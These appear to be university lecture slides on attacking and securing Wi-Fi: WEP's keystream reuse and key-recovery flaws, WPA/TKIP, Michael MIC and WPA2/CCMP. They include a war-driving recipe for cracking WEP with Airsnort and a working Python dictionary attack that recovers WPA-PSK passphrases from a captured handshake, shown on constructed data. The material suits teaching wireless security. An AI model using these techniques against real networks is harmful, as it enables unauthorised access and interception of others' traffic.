slide 1 SCSC 555 Hacking Wireless Networks (Part II – WEP & WPA)

Upload: loraine-poole

Post on 20-Jan-2016


Page 1: Slide 1 SCSC 555 Hacking Wireless Networks (Part II – WEP & WPA)

slide 1

SCSC 555

Hacking Wireless Networks (Part II – WEP & WPA)


slide 2

802.11b Overview

• Standard for wireless networks, approved by IEEE in 1999
• Two modes: infrastructure and ad hoc
• (Figure: IBSS (ad hoc) mode vs. BSS (infrastructure) mode)


slide 3

Access Point SSID

• The Service Set Identifier (SSID) differentiates one access point from another
• By default, an access point broadcasts its SSID in plaintext "beacon frames" every few seconds
• Default SSIDs are easily guessable: Linksys defaults to "linksys", Cisco to "tsunami", etc. This gives away the fact that an access point is active
• Access point settings can be changed to stop it announcing its presence in beacon frames and to replace the easily guessable SSID, but then every user must know the SSID in advance


slide 4

Wired Equivalent Privacy (WEP)

• Special-purpose protocol for 802.11b, intended to make wireless as secure as a wired network
• Goals: confidentiality, integrity, authentication
• Assumes that a secret key is shared between the access point and the clients
• Uses the RC4 stream cipher seeded with a 24-bit initialization vector concatenated with a 40-bit key (later products added 104-bit keys, which does not help, see "It Gets Worse")
  – A terrible design choice for the wireless environment
  – RC4 itself is not the bug here: SSL used the same cipher with a fresh per-connection key, so no keystream was ever reused. (RC4 has since been removed from TLS altogether, RFC 7465, because of its own statistical biases, which is a separate problem from WEP's seed reuse)


slide 5

Shared-Key Authentication

Prior to communicating data, the access point may require the client to authenticate. The 802.11 state machine (drawn in the original slide) has three states:

  unauthenticated & unassociated
    -> authenticated & unassociated
    -> authenticated & associated

Message sequence between Client and Access Point:

  AP -> Client : beacon        (or Client -> AP : probe request)
  Client -> AP : authentication request
  AP -> Client : challenge     (128 bytes, sent in the clear)
  Client -> AP : challenge encrypted with RC4(IV, K), IV sent in the clear
  AP -> Client : authentication success or failure
  Client -> AP : association request
  AP -> Client : association response

A passive eavesdropper sees both the plaintext challenge and its encryption, so it recovers the keystream RC4(IV, K) for that IV (challenge XOR response) and can answer any later challenge by reusing the same IV, without ever knowing K.


slide 6

How WEP Works

  |-- 24 bits --|-- 40 bits --|
  |     IV      |  shared key |   -> used as the RC4 seed

• The seed (IV | shared key) must never be repeated (why? the keystream is a function of the seed alone, so two frames under one seed are XORed with the same bytes)
• There is no key update protocol in 802.11b, so security relies on never repeating an IV
• The IV is sent in the clear. Worse: 802.11b says that changing the IV with each packet is optional!
• The CRC-32 checksum (the ICV) is linear with respect to XOR: crc(M ⊕ Δ) = crc(M) ⊕ crc(Δ) ⊕ crc(0…0) for equal-length inputs. If the attacker flips some bits of the plaintext (XOR with Δ), there is a known, plaintext-independent set of CRC bits (crc(Δ) ⊕ crc(0…0)) that, if flipped too, yields a valid checksum, and because encryption is XOR the flips can be applied directly to the ciphertext

=> no integrity!


slide 7

Why RC4 is a Bad Choice for WEP

• Stream ciphers require synchronization of the keystreams on both ends of the connection. This is not suitable when packet losses are common
• WEP solution: a separate seed for each packet, so a packet can be decrypted even if a previous packet was lost
• But the number of possible seeds is not large enough! RC4 seed = 24-bit initialization vector + fixed key. Assuming 1500-byte packets at 11 Mbps (roughly 900 packets per second), the 2^24 possible IVs are exhausted in about 5 hours
• Seed reuse is deadly for stream ciphers


slide 8

Recovering Keystream

• Get the access point to encrypt a known plaintext: send spam, and the access point will encrypt and forward it; or get the victim to send an email with known content
• If the attacker knows the plaintext, it is easy to recover the keystream from the ciphertext: C ⊕ M = (M ⊕ RC4(IV,key)) ⊕ M = RC4(IV,key)
  – Not a problem if this keystream is never re-used
• Even if the attacker doesn't know the plaintext, he can exploit regularities (plaintexts are not random). For example, IP packet structure is very regular


slide 9

Keystream Will Be Re-Used

• In WEP, a repeated IV means a repeated keystream, and a busy network will repeat IVs often
  – Many cards reset the IV to 0 when re-booted, then increment by 1, so expect re-use of low-value IVs
  – If IVs are chosen randomly, expect a repetition after about 2^12 packets (the square root of 2^24) due to the birthday paradox, just as with hash collisions
• Recover the keystream for each IV and store it in a table: (KnownM ⊕ RC4(IV,key)) ⊕ KnownM = RC4(IV,key)
  – Even if M is not known, regularities can be exploited
• Wait for an IV to repeat, decrypt and enjoy the plaintext: (M' ⊕ RC4(IV,key)) ⊕ RC4(IV,key) = M'


slide 10

It Gets Worse

• The misuse of RC4 in WEP is a design flaw with no fix. Longer keys do not help!
  – The problem is re-use of IVs, and their size is fixed (24 bits)
• Attacks are passive and very difficult to detect
• WEP is a perfect target for the Fluhrer, Mantin and Shamir (2001) attack on RC4's key scheduling
  – The attack requires known IVs of a special form ("weak IVs")
  – WEP sends IVs in plaintext
  – Generating IVs as counters or random numbers will produce enough "special" IVs in a matter of hours
• This results in key recovery (not just keystream recovery): the attacker can then decrypt even ciphertexts whose IV is unique


slide 11

Do Not Do This [Brian Lee]

• Ingredients: laptop (with 802.11b card, GPS, Netstumbler, Airsnort, Ethereal) and the car of your choice
• Drive around, use Netstumbler to map out active wireless networks and (using GPS) their access points
• If a network is encrypted, park the car, start Airsnort, leave it be for a few hours
  – Airsnort will passively listen to encrypted network traffic and, after 5-10 million packets, extract the encryption key
• Once the encryption key is compromised, connect to the network as if there is no encryption at all
• Alternative: use Ethereal (or the packet sniffer of your choice) to listen to decrypted traffic and analyze it
• Many networks are even less secure

Note (later tooling, not part of the slide): the statistical PTW attack implemented in aircrack-ng (2007) recovers a WEP key from tens of thousands of unique IVs rather than millions of packets, so on a busy network the waiting time is minutes, not hours.


slide 12

Weak Countermeasures

• Run a VPN on top of wireless
  – Treat wireless as you would an insecure wired network
  – VPNs have their own security and performance issues; compromise of one client may compromise the entire network
• Hide the SSID of your access point
  – Still, raw packets (probe and association frames) will reveal the SSID, since it is not encrypted!
• Have each access point maintain a list of network card (MAC) addresses that are allowed to connect to it
  – Infeasible for large networks
  – An attacker can sniff a packet from a legitimate card, then re-code (spoof) his card to use a legitimate address


slide 13

Fixing the Problem

• Extensible Authentication Protocol (EAP): developers can choose their own authentication method
  – Cisco EAP-LEAP (passwords), Microsoft EAP-TLS (public-key certificates), PEAP (passwords or certificates), etc.

• The 802.11i standard fixes the 802.11b problems
  – Patch: TKIP. Still RC4, but the per-packet RC4 key is derived by mixing a temporal key with a 48-bit packet sequence counter (so no keystream re-use and no FMS-style weak keys), a Michael MIC replaces the CRC as the integrity check, and temporal keys are set up and renewed by the 802.1X / 4-way handshake instead of being configured by hand
  – Use the same network card, only upgrade the firmware or driver
  – Long-term: AES in CCMP mode, 128-bit keys, 48-bit packet numbers (IVs)
  – A block cipher (in an authenticated-encryption mode) instead of a stream cipher
  – Requires new network card hardware


slide 14

Hacking Wireless Networks (Part III – WPA)

slide 15

What is WPA?

WPA (Wi-Fi Protected Access), sometimes called WEP2
■ An interim solution to replace WEP
■ Aimed to work with hardware designed for WEP
■ Still uses RC4 for encryption
■ Several new elements were introduced:
  - TKIP (Temporal Key Integrity Protocol)
  - MIC (message integrity code) to prevent forgery
  - 48-bit IV (packet sequence counter) to prevent replay attacks
  - A mixing function that generates a per-frame key

slide 16

WPA Structure

(Figure: TKIP frame construction. The TKIP mixing function takes the base WEP key K and produces the per-frame key K'; the integrity key feeds the MIC function, whose output is appended to the data. The plain frame "802.11 Hdr | data" becomes "802.11 Hdr | IV | Data | MIC", with Data || MIC encrypted by RC4 under K'.)


slide 17

WPA Structure (in detail)

slide 18

WPA - Modes of Operation

Enterprise Mode:
- Requires an authentication server, RADIUS (Remote Authentication Dial In User Service), for authentication and key distribution
- RADIUS gives centralized management of user credentials, and each user ends up with an individual pairwise master key

Pre-shared key (PSK) Mode:
- Does not require an authentication server
- A "shared secret" (passphrase) is used for authentication to the access point; because every key is derived from it, it is vulnerable to offline dictionary attacks once one handshake has been captured

slide 19

Enterprise Mode Diagram

slide 20

PSK Mode Diagram

slide 21

Issues of PSK Mode

• Needed if no authentication server is in use
• If the "shared secret" is revealed, network security is compromised: every client derives the same master key from it, so whoever holds it can also derive other clients' session keys from their handshakes
• No standardized way of changing the shared secret
• A long, high-entropy shared secret increases the attacker's effort: the only attack is guessing, and the fewer guessable candidates there are, the smaller the chance that a dictionary attack succeeds
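The dictionary attack that the PSK-mode slides warn about, as an added Python example that is not part of the original deck. It goes slightly beyond the slides by using the 802.11i derivation the attack relies on: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes), PTK = PRF-512(PMK, "Pairwise key expansion", MACs and nonces), and the EAPOL-Key MIC computed with the first 128 bits of the PTK (HMAC-MD5 for TKIP, HMAC-SHA1 truncated to 16 bytes for CCMP). The SSID, MAC addresses, nonces, EAPOL frame bytes and wordlist are constructed; because nothing was really captured, the "captured" MIC is computed inside the block from a known passphrase.

```python
"""Added example: offline dictionary attack on WPA-PSK from one captured 4-way handshake.
All handshake values are constructed; the 'captured' MIC is computed from a known passphrase."""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA-PSK maps the shared secret to the PMK with PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || i), i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(nonces)||max(nonces))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 64)


def eapol_mic(kck: bytes, eapol_frame: bytes, cipher: str) -> bytes:
    """Key MIC over the EAPOL-Key frame with its MIC field zeroed.
    Descriptor version 1 (TKIP) uses HMAC-MD5; version 2 (CCMP) uses HMAC-SHA1 truncated to 16 bytes."""
    if cipher == "tkip":
        return hmac.new(kck, eapol_frame, hashlib.md5).digest()
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def crack_psk(wordlist, ssid, aa, spa, anonce, snonce, eapol_frame, captured_mic, cipher="ccmp"):
    """Everything except the passphrase is visible in the capture, so each candidate
    is checked offline with no further contact with the network. Returns the match or None."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = derive_ptk(pmk, aa, spa, anonce, snonce)[:16]   # KCK = first 128 bits of the PTK
        if hmac.compare_digest(eapol_mic(kck, eapol_frame, cipher), captured_mic):
            return candidate
    return None


# Constructed handshake for a hypothetical network (not a real capture).
SSID = "corp-guest"
AA = bytes.fromhex("0014a5bbccdd")             # authenticator (AP) MAC address
SPA = bytes.fromhex("0016cf112233")            # supplicant (client) MAC address
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# EAPOL-Key message 2 with the 16-byte MIC field zeroed (constructed bytes, layout abbreviated).
EAPOL_MSG2 = bytes.fromhex("0103007502010a00000000000000000001") + SNONCE + bytes(50)
TRUE_PASSPHRASE = "letmein123"


def captured_mic(passphrase: str = TRUE_PASSPHRASE) -> bytes:
    """What a sniffer would read out of message 2; computed here because the data is constructed."""
    kck = derive_ptk(pmk_from_passphrase(passphrase, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    return eapol_mic(kck, EAPOL_MSG2, "ccmp")


def run_attack(wordlist=("password", "qwerty", "letmein123", "correct horse battery staple")):
    return crack_psk(wordlist, SSID, AA, SPA, ANONCE, SNONCE, EAPOL_MSG2, captured_mic())


if __name__ == "__main__":
    print("recovered passphrase:", run_attack())
```

The 4096 PBKDF2 iterations only make each guess cost a few thousand SHA-1 computations; they do not stop the attack, they just slow it down, which is why the slides' advice about a long, complex shared secret matters. The same loop is what aircrack-ng and hashcat run at scale against a captured handshake (WPA3-Personal's SAE exchange was designed specifically to remove this offline guessing).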


slide 22

Summary: Security Mechanisms in WPA

slide 23

802.1X authentication prevents unauthorized end users from accessing enterprise networks

slide 24

TKIP – Temporal Key Integrity Protocol

TKIP is responsible for generating the per-packet encryption key, encrypting the message with RC4 and verifying its integrity

TKIP ensures:
- The encryption key changes with every packet
- The encryption key is unique for every client (the MAC address enters the key mixing)
- TKIP key material is 256 bits long: a 128-bit temporal key plus two 64-bit Michael MIC keys

Compare WEP: encryption key = shared secret concatenated with the IV

The TKIP per-packet key is built from:
- the 128-bit temporal key (shared by the client and the AP)
- the client device MAC address
- a 48-bit IV (packet sequence counter) that prevents IV reuse and replays (WEP: 24-bit IV)

slide 25

TKIP for Data Privacy

• TKIP key mixing function + temporal key = per-packet key
• Temporal keys: 128 bits, change frequently, have a definite lifetime
• Phase 1: the transmitter MAC address, the temporal key and the four most significant octets of the packet sequence counter are fed through the S-box to generate an intermediate key (this phase only needs recomputing every 2^16 packets, since the low counter octets do not enter it)
• Phase 2: the intermediate key is mixed with the two least significant octets of the packet sequence counter to produce the 128-bit per-packet RC4 key
• The result is a unique encryption key per packet; each key encrypts only one packet, and the mixing keeps the RC4 seeds out of the weak-key classes used against WEP

slide 26

Message Integrity Check (MIC)

• Used to enforce data integrity
• The "Message Integrity Code" (MIC) is a 64-bit value computed with the Michael algorithm
• The MIC is appended to the data and encrypted with it in the TKIP packet
• The sender and the receiver each compute the MIC and compare. MIC does not match = the data was manipulated
• Detects alteration of the packet content, whether from a transmission error or deliberate manipulation
• Uses a 64-bit key and processes the data in 32-bit blocks
• Only shifts, XORs and additions, so it runs on old WEP hardware. That constraint is also why Michael is weak (forgery security on the order of 2^20), so 802.11i pairs it with countermeasures: after two MIC failures within 60 seconds a station stops TKIP traffic for 60 seconds and rekeys
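The Michael algorithm from the slide, written out as an added Python example (not code from the deck). It implements the real Michael block function and padding rule (a 0x5a byte followed by four to seven zero bytes, up to a multiple of four), and the 802.11i convention that TKIP runs Michael over DA || SA || priority || three zero bytes || MSDU payload, so the addresses are authenticated as well. The key and addresses in the demo are constructed; the one test vector used (all-zero key, empty message) is the first entry of the 802.11i Michael test set.

```python
"""Added example: the Michael MIC used by TKIP (constructed inputs)."""
import struct

MASK32 = 0xFFFFFFFF


def _rol(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK32


def _ror(x: int, n: int) -> int:
    return ((x >> n) | (x << (32 - n))) & MASK32


def _xswap(x: int) -> int:
    """Swap the two bytes inside each 16-bit half of x."""
    return ((x & 0xFF00FF00) >> 8) | ((x & 0x00FF00FF) << 8)


def _block(l: int, r: int, m: int):
    """One Michael round: only rotates, XORs and 32-bit additions, cheap enough for WEP-era NICs."""
    l ^= m
    r ^= _rol(l, 17)
    l = (l + r) & MASK32
    r ^= _xswap(l)
    l = (l + r) & MASK32
    r ^= _rol(l, 3)
    l = (l + r) & MASK32
    r ^= _ror(l, 2)
    l = (l + r) & MASK32
    return l, r


def michael(key: bytes, msg: bytes) -> bytes:
    """64-bit Michael MIC of msg under a 64-bit key (two little-endian 32-bit words).
    Padding: one 0x5a byte, then 4 to 7 zero bytes so the total length is a multiple of 4."""
    assert len(key) == 8, "Michael keys are 64 bits"
    l, r = struct.unpack("<II", key)
    padded = msg + b"\x5a" + b"\x00" * (4 + (3 - len(msg) % 4))
    for (m,) in struct.iter_unpack("<I", padded):      # 32-bit little-endian words
        l, r = _block(l, r, m)
    return struct.pack("<II", l, r)


def tkip_mic_input(da: bytes, sa: bytes, priority: int, msdu: bytes) -> bytes:
    """TKIP authenticates DA || SA || priority || 0 0 0 || MSDU, not just the payload as WEP's CRC did."""
    return da + sa + bytes([priority, 0, 0, 0]) + msdu


def verify(key: bytes, da: bytes, sa: bytes, msdu: bytes, mic: bytes) -> bool:
    """Receiver-side check: recompute and compare (a mismatch counts as a MIC failure)."""
    return michael(key, tkip_mic_input(da, sa, 0, msdu)) == mic


if __name__ == "__main__":
    k = bytes(8)
    print(michael(k, b"").hex())                       # 82925c1ca1d130b8
    da, sa = bytes.fromhex("0014a5bbccdd"), bytes.fromhex("0016cf112233")   # constructed addresses
    tag = michael(k, tkip_mic_input(da, sa, 0, b"payload"))
    print(verify(k, da, sa, b"payload", tag), verify(k, da, sa, b"paylOad", tag))
```

Note that the whole function is invertible given the key, which is what makes Michael so much weaker than a real MAC: with 2^20-level forgery security it relies on the countermeasures above, and on the encrypted MIC never being exposed, rather than on its own strength.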


slide 27

WPA2

• The long-term solution specified by IEEE 802.11i: AES in a (then new) mode called CCM for encryption
• Counter Mode with CBC-MAC Protocol (CCMP) encryption
• CCMP = CTR mode (confidentiality) + CBC-MAC (integrity), both under the same AES key
• Several new elements were introduced:
  - The base (temporal) key K = 128 bits
  - The MIC is 64 bits, to prevent forgery
  - IV (nonce) = 48 bits, to prevent replay attacks
  - The packet number (sequence counter) is used to generate the IV
• Will require new or replacement hardware (APs and NICs)

slide 28

WPA2

(Figure: CCMP frame layout)

  +------------+---------------------+------+-----+-----+
  | 802.11 Hdr | 802.11i (CCMP) Hdr  | Data | MIC | FCS |
  |            | IV (packet number), |      |     |     |
  |            | Key ID              |      |     |     |
  +------------+---------------------+------+-----+-----+
                                     |<-encrypted by AES->|
  |<---------- authenticated by MIC ------------>|

slide 29

Encryption Method Comparison Table

  Property          WEP            WPA                              WPA2
  ----------------  -------------  -------------------------------  -------------
  Cipher            RC4            RC4                              AES
  Key Size          40 bits        128 bits encryption,             128 bits
                                   64 bits authentication (MIC)
  Key Life          24-bit IV      48-bit IV                        48-bit IV
  Packet Key        Concatenated   Mixing function                  Not needed
  Data Integrity    CRC-32         Michael algorithm                CCM
  Header Integrity  None           Michael algorithm                CCM
  Replay Attack     None           IV sequence                      IV sequence
  Key Management    None           EAP based                        EAP based


slide 30

Conclusions

• WEP is not secure anymore!
• WPA solves almost all of WEP's weaknesses
• When these slides were written, WPA was still considered secure, providing authentication, encryption and access control, and "not yet broken". That has not held up: TKIP's Michael MIC and per-packet keying were attacked in practice by Beck and Tews (2008), and in either generation a PSK network with a weak passphrase falls to an offline dictionary attack on one captured handshake
• WPA2 (AES-CCMP) is a stronger cipher suite than WPA/TKIP and is the robust choice for WLANs; use it (or WPA3) rather than TKIP wherever the hardware allows